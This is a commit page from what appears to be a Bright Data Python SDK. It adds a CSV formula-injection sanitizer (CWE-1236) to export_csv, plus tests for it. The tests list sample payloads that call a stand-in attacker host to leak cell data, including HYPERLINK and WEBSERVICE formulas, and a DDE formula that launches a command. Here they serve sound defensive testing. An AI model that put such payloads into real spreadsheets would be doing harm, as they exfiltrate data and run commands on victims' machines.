Skip to content

Commit 21e6a7b

Browse files
authored
fix: sanitize CSV formula injection in export_csv (CWE-1236) (#52)
* fix: sanitize CSV formula injection in export_csv (CWE-1236)
1 parent 8cd389c commit 21e6a7b

2 files changed

Lines changed: 160 additions & 0 deletions

File tree

‎src/brightdata/datasets/utils.py‎

Lines changed: 23 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -7,6 +7,9 @@
77
from pathlib import Path
88
from typing import Any, Dict, List, Optional, Union
99

10+
# Leading characters spreadsheet apps treat as the start of a formula.
11+
_FORMULA_TRIGGER_CHARS = ("=", "+", "-", "@", "\t", "\r")
12+
1013

1114
def export_json(
1215
data: List[Dict[str, Any]],
@@ -51,11 +54,26 @@ def export_jsonl(
5154
return filepath
5255

5356

57+
def _sanitize_csv_cell(value: Any) -> Any:
58+
"""
59+
Neutralize spreadsheet formula injection (CWE-1236) in a single CSV cell.
60+
61+
Strings starting with '=', '+', '-', '@', a tab, or a carriage return are
62+
prefixed with a leading single quote, which spreadsheet applications
63+
treat as an explicit "text" marker instead of executing the value as a
64+
formula (e.g. HYPERLINK/WEBSERVICE/IMPORTXML/DDE payloads).
65+
"""
66+
if isinstance(value, str) and value.startswith(_FORMULA_TRIGGER_CHARS):
67+
return "'" + value
68+
return value
69+
70+
5471
def export_csv(
5572
data: List[Dict[str, Any]],
5673
filepath: Union[str, Path],
5774
fields: Optional[List[str]] = None,
5875
flatten_nested: bool = True,
76+
sanitize: bool = True,
5977
) -> Path:
6078
"""
6179
Export dataset results to CSV file.
@@ -65,6 +83,9 @@ def export_csv(
6583
filepath: Output file path
6684
fields: Specific fields to export (default: all fields from first record)
6785
flatten_nested: Convert nested objects/arrays to JSON strings (default: True)
86+
sanitize: Escape cell values that would be interpreted as formulas by
87+
spreadsheet applications (leading '=', '+', '-', '@', tab, or CR),
88+
preventing CSV/formula injection (CWE-1236). Default: True.
6889
6990
Returns:
7091
Path to the created file
@@ -88,6 +109,8 @@ def export_csv(
88109
value = record.get(field)
89110
if flatten_nested and isinstance(value, (dict, list)):
90111
value = json.dumps(value, default=str, ensure_ascii=False)
112+
if sanitize:
113+
value = _sanitize_csv_cell(value)
91114
row[field] = value
92115
processed_data.append(row)
93116

Lines changed: 137 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,137 @@
1+
"""
2+
Tests for CSV/formula injection sanitization in export_csv (CWE-1236).
3+
4+
Scraped, attacker-influenced data (e.g. product titles from untrusted sites)
5+
must not be written verbatim into CSV cells when the value would be
6+
interpreted as a formula by Excel/Google Sheets/LibreOffice (leading
7+
'=', '+', '-', '@', tab, or CR). By default export_csv now prefixes such
8+
values with a single quote; `sanitize=False` preserves the old byte-exact
9+
behavior for callers who explicitly opt out.
10+
"""
11+
12+
import csv
13+
14+
import pytest
15+
16+
from brightdata.datasets.utils import export, export_csv
17+
18+
FORMULA_PAYLOADS = [
19+
'=HYPERLINK("https://attacker.example/leak?p="&A1,"click")',
20+
'+WEBSERVICE("https://attacker.example/exfil")',
21+
"-2+3",
22+
"@SUM(1,1)",
23+
'=cmd|"/c calc"!A0',
24+
]
25+
26+
27+
class TestExportCsvSanitization:
28+
def test_default_sanitizes_formula_prefixes(self, tmp_path):
29+
data = [{"name": payload} for payload in FORMULA_PAYLOADS]
30+
filepath = export_csv(data, tmp_path / "out.csv")
31+
32+
with open(filepath, newline="", encoding="utf-8") as f:
33+
reader = csv.DictReader(f)
34+
assert reader.fieldnames == ["name"]
35+
rows = list(reader)
36+
37+
# Sanitization must not drop, merge, or duplicate rows/columns even
38+
# though several payloads contain commas and embedded quotes that
39+
# exercise the CSV module's own quoting.
40+
assert len(rows) == len(FORMULA_PAYLOADS)
41+
for row, payload in zip(rows, FORMULA_PAYLOADS):
42+
# Reader gives us the value with the CSV-level quoting already
43+
# stripped, so a leading "'" means our sanitizer ran.
44+
assert row["name"] == "'" + payload
45+
46+
def test_safe_values_are_untouched(self, tmp_path):
47+
data = [{"name": "Regular Product Name", "price": "19.99", "count": 5}]
48+
filepath = export_csv(data, tmp_path / "out.csv")
49+
50+
with open(filepath, newline="", encoding="utf-8") as f:
51+
rows = list(csv.DictReader(f))
52+
53+
assert rows[0]["name"] == "Regular Product Name"
54+
assert rows[0]["price"] == "19.99"
55+
assert rows[0]["count"] == "5"
56+
57+
def test_sanitize_false_preserves_legacy_behavior(self, tmp_path):
58+
payload = '=HYPERLINK("https://attacker.example/leak","x")'
59+
data = [{"name": payload}]
60+
filepath = export_csv(data, tmp_path / "out.csv", sanitize=False)
61+
62+
with open(filepath, newline="", encoding="utf-8") as f:
63+
rows = list(csv.DictReader(f))
64+
65+
assert rows[0]["name"] == payload
66+
67+
def test_non_string_values_are_unaffected(self, tmp_path):
68+
data = [{"count": 5, "ratio": 1.5, "active": True, "missing": None}]
69+
filepath = export_csv(data, tmp_path / "out.csv")
70+
71+
with open(filepath, newline="", encoding="utf-8") as f:
72+
rows = list(csv.DictReader(f))
73+
74+
assert rows[0]["count"] == "5"
75+
assert rows[0]["ratio"] == "1.5"
76+
assert rows[0]["active"] == "True"
77+
assert rows[0]["missing"] == ""
78+
79+
def test_flattened_nested_values_use_flattened_string_for_sanitization(self, tmp_path):
80+
# Sanitization runs after JSON-flattening. json.dumps always wraps
81+
# lists/dicts in '[' or '{', so the flattened string itself is never
82+
# mistaken for a formula - this pins down that ordering/behavior.
83+
data = [{"tags": ["=1+1", "safe"]}]
84+
filepath = export_csv(data, tmp_path / "out.csv")
85+
86+
with open(filepath, newline="", encoding="utf-8") as f:
87+
rows = list(csv.DictReader(f))
88+
89+
assert rows[0]["tags"] == '["=1+1", "safe"]'
90+
91+
@pytest.mark.parametrize("trigger", ["=", "+", "-", "@", "\t", "\r"])
92+
def test_all_documented_trigger_characters_are_escaped(self, tmp_path, trigger):
93+
data = [{"name": f"{trigger}payload"}]
94+
filepath = export_csv(data, tmp_path / "out.csv")
95+
96+
with open(filepath, newline="", encoding="utf-8") as f:
97+
rows = list(csv.DictReader(f))
98+
99+
assert rows[0]["name"] == f"'{trigger}payload"
100+
101+
def test_export_auto_detect_forwards_sanitize_kwarg(self, tmp_path):
102+
payload = '=HYPERLINK("https://attacker.example/leak","x")'
103+
data = [{"name": payload}]
104+
filepath = export(data, tmp_path / "out.csv", sanitize=False)
105+
106+
with open(filepath, newline="", encoding="utf-8") as f:
107+
rows = list(csv.DictReader(f))
108+
109+
assert rows[0]["name"] == payload
110+
111+
def test_empty_data_still_touches_file(self, tmp_path):
112+
filepath = export_csv([], tmp_path / "out.csv")
113+
assert filepath.exists()
114+
assert filepath.read_text(encoding="utf-8") == ""
115+
116+
def test_output_is_well_formed_csv_across_multiple_rows_and_columns(self, tmp_path):
117+
# Mixes sanitized and unsanitized values across several rows/columns
118+
# to make sure escaping one cell doesn't corrupt column alignment,
119+
# row count, or the header for the rest of the file.
120+
data = [
121+
{"name": '=HYPERLINK("https://x","y")', "price": "9.99", "note": "ok"},
122+
{"name": "Regular Item", "price": "-1.00", "note": "@mention in review"},
123+
{"name": "Another Item", "price": "5.00", "note": "plain text"},
124+
]
125+
filepath = export_csv(data, tmp_path / "out.csv")
126+
127+
with open(filepath, newline="", encoding="utf-8") as f:
128+
reader = csv.DictReader(f)
129+
assert reader.fieldnames == ["name", "price", "note"]
130+
rows = list(reader)
131+
132+
assert len(rows) == len(data)
133+
assert rows[0]["name"] == '\'=HYPERLINK("https://x","y")'
134+
assert rows[0]["price"] == "9.99"
135+
assert rows[1]["price"] == "'-1.00"
136+
assert rows[1]["note"] == "'@mention in review"
137+
assert rows[2] == {"name": "Another Item", "price": "5.00", "note": "plain text"}

0 commit comments

Comments
 (0)